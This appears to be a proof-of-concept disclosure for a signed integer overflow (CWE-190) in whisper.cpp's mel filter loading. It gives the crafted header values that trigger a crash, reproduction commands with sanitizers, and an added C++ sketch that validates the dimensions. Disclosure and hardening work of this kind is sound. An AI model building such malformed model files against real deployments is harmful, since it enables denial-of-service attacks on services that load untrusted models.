# PoC: Signed Integer Overflow in whisper.cpp Mel Filter Loading

**Format:** GGML (.bin)

**Target:** whisper.cpp (ggml-org/whisper.cpp)

**CWE:** CWE-190 (Integer Overflow)

## Vulnerability

Signed integer overflow in mel filter size calculation. `n_mel=0x7FFFFFFF * n_fft=2` overflows int32 → massive `vector::resize()` → crash.

## Reproduction

```bash
git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
mkdir build-asan && cd build-asan
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
make -j$(nproc)
./bin/whisper-cli -m ../poc_mel_overflow.bin -f /dev/null
```

UBSan reports: `runtime error: signed integer overflow: 2147483647 * 2`

**Tested:** whisper.cpp commit 364c77f4
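One way to guard the size calculation described above, shown as an added example that is not code from whisper.cpp: the dimensions are range-checked, multiplied in 64-bit, and compared against the bytes left in the file before anything is resized. The function names, the `bytes_left` parameter and the sample dimensions are assumptions made for this sketch.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

// Validate header-declared mel filter dimensions before they size a buffer.
// bytes_left = bytes remaining in the model file after the two dimension
// fields (hypothetical parameter; the caller derives it from the file size).
bool checked_mel_filter_count(int32_t n_mel, int32_t n_fft,
                              uint64_t bytes_left, size_t &count) {
    // Zero or negative dimensions are never valid.
    if (n_mel <= 0 || n_fft <= 0) return false;

    // Widen first: the product of two positive int32 values always fits in
    // int64, so this multiplication cannot overflow.
    const int64_t n = static_cast<int64_t>(n_mel) * static_cast<int64_t>(n_fft);

    // The coefficients must actually be present in the file. Dividing
    // instead of multiplying by sizeof(float) keeps this check overflow-free.
    if (static_cast<uint64_t>(n) > bytes_left / sizeof(float)) return false;

    count = static_cast<size_t>(n);
    return true;
}

// Hypothetical loader step: resize only after the dimensions are validated.
bool resize_mel_filters(int32_t n_mel, int32_t n_fft, uint64_t bytes_left,
                        std::vector<float> &data) {
    size_t count = 0;
    if (!checked_mel_filter_count(n_mel, n_fft, bytes_left, count)) return false;
    data.resize(count);
    return true;
}

int main() {
    std::vector<float> data;
    // Constructed inputs: the PoC's dimensions against a 1 KiB remainder,
    // then small dimensions whose coefficient data is fully present.
    const bool poc_ok = resize_mel_filters(0x7FFFFFFF, 2, 1024, data);
    const bool sane_ok = resize_mel_filters(80, 201, 80 * 201 * sizeof(float), data);
    std::printf("poc dims accepted: %d\n", poc_ok);
    std::printf("sane dims accepted: %d (%zu floats)\n", sane_ok, data.size());
    return 0;
}
```

Bounding the count by the remaining file size means a header cannot request more memory than the file itself could fill.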